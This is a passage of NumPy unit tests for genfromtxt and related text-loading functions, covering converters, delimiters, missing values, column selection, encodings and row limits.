def test_tricky_converter_bug1666(self):
# Test some corner cases
s = TextIO('q1,2\nq3,4')
cnv = lambda s: float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0: cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_converters_and_usecols(self):
dstr = "1,5,-1,1:1\n2,8,-1,1:n\n3,3,-2,m:n\n"
dmap = {'1:1':0, '1:n':1, 'm:1':2, 'm:n':3}
dtyp = [('e1','i4'),('e2','i4'),('e3','i2'),('n', 'i1')]
conv = {0: int, 1: int, 2: int, 3: lambda r: dmap[r.decode()]}
test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
names=None, converters=conv)
control = np.rec.array([(1,5,-1,0), (2,8,-1,1), (3,3,-2,3)], dtype=dtyp)
assert_equal(test, control)
dtyp = [('e1','i4'),('e2','i4'),('n', 'i1')]
test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
usecols=(0,1,3), names=None, converters=conv)
control = np.rec.array([(1,5,0), (2,8,1), (3,3,3)], dtype=dtyp)
assert_equal(test, control)
def test_dtype_with_object(self):
# Test using an explicit dtype with an object
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
ndtype = [('nest', [('idx', int), ('code', object)])]
with assert_raises_regex(NotImplementedError,
'Nested fields.* not supported.*'):
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
def test_userconverters_with_explicit_dtype(self):
# Test user_converters w/ explicit (standard) dtype
data = TextIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_utf8_userconverters_with_explicit_dtype(self):
utf8 = b'\xcf\x96'
with temppath() as path:
with open(path, 'wb') as f:
f.write(b'skip,skip,2001-01-01' + utf8 + b',1.0,skip')
test = np.genfromtxt(path, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: np.unicode},
encoding='UTF-8')
control = np.array([('2001-01-01' + utf8.decode('UTF-8'), 1.)],
dtype=[('', '|U11'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
# Test space delimiter
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[1., 2., 3., 4., 5.],
[6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
# Test using an integer for delimiter
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = TextIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
# Test w/ a delimiter tab
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(TextIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
# Test the selection of columns
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
# Test giving usecols with a comma-separated string
data = "1 2 3\n4 5 6"
test = np.genfromtxt(TextIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
# Test usecols with an explicit structured dtype
data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(
data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], [b"JOE", b"BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
# Test usecols with an integer
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
# Test usecols with named columns
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
# Test that an empty file raises the proper warning.
with suppress_warnings() as sup:
sup.filter(message="genfromtxt: Empty input file:")
data = TextIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
# Check that a nested dtype isn't MIA
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.ndfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = TextIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.mafromtxt(data, dtype=None, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', float), ('B', float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(TextIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.mafromtxt(TextIO(data),
missing_values={0: -9, 1: -99, 2: -999j}, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.mafromtxt(TextIO(data),
missing_values={0: -9, 'B': -99, 'C': -999j},
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
# Test with missing and filling values
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0: "N/A", 'b': " ", 2: "???"},
filling_values={0: 0, 'b': 0, 2: -999})
test = np.genfromtxt(TextIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
data2 = "1,2,*,4\n5,*,7,8\n"
test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
missing_values="*", filling_values=0)
ctrl = np.array([[1, 2, 0, 4], [5, 0, 7, 8]])
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
missing_values="*", filling_values=-1)
ctrl = np.array([[1, 2, -1, 4], [5, -1, 7, 8]])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = TextIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
# Test masked column
data = TextIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
# Test masked column
data = TextIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
# Test invalid raise
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the
# callable in assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.ndfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
# Test invalid_raise with usecols
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the
# callable in assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.ndfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
# Test inconsistent dtype
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = TextIO("\n".join(data))
converters = {4: lambda x: "(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
# Test default format
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
# Test single dtype w/o names
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
# Test single dtype w explicit names
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
# Test single dtype w implicit names
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
# Test easy structured dtype
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
# Test autostrip
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
mtest = np.ndfromtxt(TextIO(data), **kwargs)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
mtest = np.ndfromtxt(TextIO(data), autostrip=True, **kwargs)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
# Test the 'replace_space' option
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_replace_space_known_dtype(self):
# Test the 'replace_space' (and related) options when dtype != None
txt = "A.A, B (B), C:C\n1, 2, 3"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", int)]
ctrl = np.array((1, 2, 3), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
# Test w/ incomplete names
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), **kwargs)
def test_names_auto_completion(self):
# Make sure that names are properly completed
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(TextIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
# Make sure we pick up the right names w/ usecols
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
# Test fix-width w/ names
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
# Test missing values
data = b"1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values=-999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_comments_is_none(self):
# Github issue 329 (None was previously being converted to 'None').
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1], b'testNonetherestofthedata')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1], b' testNonetherestofthedata')
def test_latin1(self):
latin1 = b'\xf6\xfc\xf6'
norm = b"norm1,norm2,norm3\n"
enc = b"test1,testNonethe" + latin1 + b",test3\n"
s = norm + enc + norm
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test[1, 0], b"test1")
assert_equal(test[1, 1], b"testNonethe" + latin1)
assert_equal(test[1, 2], b"test3")
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',',
encoding='latin1')
assert_equal(test[1, 0], u"test1")
assert_equal(test[1, 1], u"testNonethe" + latin1.decode('latin1'))
assert_equal(test[1, 2], u"test3")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(b"0,testNonethe" + latin1),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test['f0'], 0)
assert_equal(test['f1'], b"testNonethe" + latin1)
def test_binary_decode_autodtype(self):
utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
v = self.loadfunc(BytesIO(utf16), dtype=None, encoding='UTF-16')
assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))
def test_utf8_byte_encoding(self):
utf8 = b"\xcf\x96"
norm = b"norm1,norm2,norm3\n"
enc = b"test1,testNonethe" + utf8 + b",test3\n"
s = norm + enc + norm
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(TextIO(s),
dtype=None, comments=None, delimiter=',')
assert_(w[0].category is np.VisibleDeprecationWarning)
ctl = np.array([
[b'norm1', b'norm2', b'norm3'],
[b'test1', b'testNonethe' + utf8, b'test3'],
[b'norm1', b'norm2', b'norm3']])
assert_array_equal(test, ctl)
def test_utf8_file(self):
utf8 = b"\xcf\x96"
with temppath() as path:
with open(path, "wb") as f:
f.write((b"test1,testNonethe" + utf8 + b",test3\n") * 2)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',', encoding="UTF-8")
ctl = np.array([
["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"],
["test1", "testNonethe" + utf8.decode("UTF-8"), "test3"]],
dtype=np.unicode)
assert_array_equal(test, ctl)
# test a mixed dtype
with open(path, "wb") as f:
f.write(b"0,testNonethe" + utf8)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',', encoding="UTF-8")
assert_equal(test['f0'], 0)
assert_equal(test['f1'], "testNonethe" + utf8.decode("UTF-8"))
def test_utf8_file_nodtype_unicode(self):
# bytes encoding with non-latin1 -> unicode upcast
utf8 = u'\u03d6'
latin1 = u'\xf6\xfc\xf6'
# skip test if cannot encode utf8 test string with preferred
# encoding. The preferred encoding is assumed to be the default
# encoding of io.open. Will need to change this for PyTest, maybe
# using pytest.mark.xfail(raises=***).
try:
encoding = locale.getpreferredencoding()
utf8.encode(encoding)
except (UnicodeError, ImportError):
pytest.skip('Skipping test_utf8_file_nodtype_unicode, '
'unable to encode utf8 in preferred encoding')
with temppath() as path:
with io.open(path, "wt") as f:
f.write(u"norm1,norm2,norm3\n")
f.write(u"norm1," + latin1 + u",norm3\n")
f.write(u"test1,testNonethe" + utf8 + u",test3\n")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '',
np.VisibleDeprecationWarning)
test = np.genfromtxt(path, dtype=None, comments=None,
delimiter=',')
# Check for warning when encoding not specified.
assert_(w[0].category is np.VisibleDeprecationWarning)
ctl = np.array([
["norm1", "norm2", "norm3"],
["norm1", latin1, "norm3"],
["test1", "testNonethe" + utf8, "test3"]],
dtype=np.unicode)
assert_array_equal(test, ctl)
def test_recfromtxt(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = TextIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', int), ('b', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,3')
dtype = [('a', int), ('b', float)]
test = np.recfromcsv(data, missing_values='N/A', dtype=dtype)
control = np.array([(0, 1), (2, 3)],
dtype=dtype)
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
#gh-10394
data = TextIO('color\n"red"\n"blue"')
test = np.recfromcsv(data, converters={0: lambda x: x.strip(b'\"')})
control = np.array([('red',), ('blue',)], dtype=[('color', (bytes, 4))])
assert_equal(test.dtype, control.dtype)
assert_equal(test, control)
def test_max_rows(self):
# Test the `max_rows` keyword argument.
data = '1 2\n3 4\n5 6\n7 8\n9 10\n'
txt = TextIO(data)
a1 = np.genfromtxt(txt, max_rows=3)
a2 = np.genfromtxt(txt)
assert_equal(a1, [[1, 2], [3, 4], [5, 6]])
assert_equal(a2, [[7, 8], [9, 10]])
# max_rows must be at least 1.
assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=0)
# An input with several invalid rows.
data = '1 1\n2 2\n0 \n3 3\n4 4\n5 \n6 \n7 \n'
test = np.genfromtxt(TextIO(data), max_rows=2)
control = np.array([[1., 1.], [2., 2.]])
assert_equal(test, control)
# Test keywords conflict
assert_raises(ValueError, np.genfromtxt, TextIO(data), skip_footer=1,
max_rows=4)
# Test with invalid value
assert_raises(ValueError, np.genfromtxt, TextIO(data), max_rows=4)
# Test with invalid not raise
with suppress_warnings() as sup:
sup.filter(ConversionWarning)
test = np.genfromtxt(TextIO(data), max_rows=4, invalid_raise=False)
control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
assert_equal(test, control)
test = np.genfromtxt(TextIO(data), max_rows=5, invalid_raise=False)
control = np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]])
assert_equal(test, control)
# Structured array with field names.
data = 'a b\n#c d\n1 1\n2 2\n#0 \n3 3\n4 4\n5 5\n'
# Test with header, names and comments
txt = TextIO(data)
test = np.genfromtxt(txt, skip_header=1, max_rows=3, names=True)
control = np.array([(1.0, 1.0), (2.0, 2.0), (3.0, 3.0)],
dtype=[('c', '<f8'), ('d', '<f8')])
assert_equal(test, control)
# To continue reading the same "file", don't use skip_header or
# names, and use the previously determined dtype.
test = np.genfromtxt(txt, max_rows=None, dtype=test.dtype)
control = np.array([(4.0, 4.0), (5.0, 5.0)],
dtype=[('c', '<f8'), ('d', '<f8')])
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file
# object
tgt = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
with temppath() as name:
with open(name, 'w') as f:
f.write(data)
res = np.genfromtxt(name)
assert_array_equal(res, tgt)
def test_gft_from_gzip(self):
# Test that we can load data from a gzipped file
wanted = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
s = BytesIO()
with gzip.GzipFile(fileobj=s, mode='w') as g:
g.write(asbytes(data))
with temppath(suffix='.gz2') as name:
with open(name, 'w') as f:
f.write(data)
assert_array_equal(np.genfromtxt(name), wanted)
def test_gft_using_generator(self):
# gft doesn't work with unicode.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_auto_dtype_largeint(self):
# Regression test for numpy/numpy#5635 whereby large integers could
# cause OverflowErrors.
# Test the automatic definition of the output dtype
#
# 2**66 = 73786976294838206464 => should convert to float
# 2**34 = 17179869184 => should convert to int64
# 2**10 = 1024 => should convert to int (int32 on 32-bit systems,
# int64 on 64-bit systems)
data = TextIO('73786976294838206464 17179869184 1024')
test = np.ndfromtxt(data, dtype=None)
assert_equal(test.dtype.names, ['f0', 'f1', 'f2'])
assert_(test.dtype['f0'] == float)
assert_(test.dtype['f1'] == np.int64)
assert_(test.dtype['f2'] == np.integer)
assert_allclose(test['f0'], 73786976294838206464.)
assert_equal(test['f1'], 17179869184)
assert_equal(test['f2'], 1024)
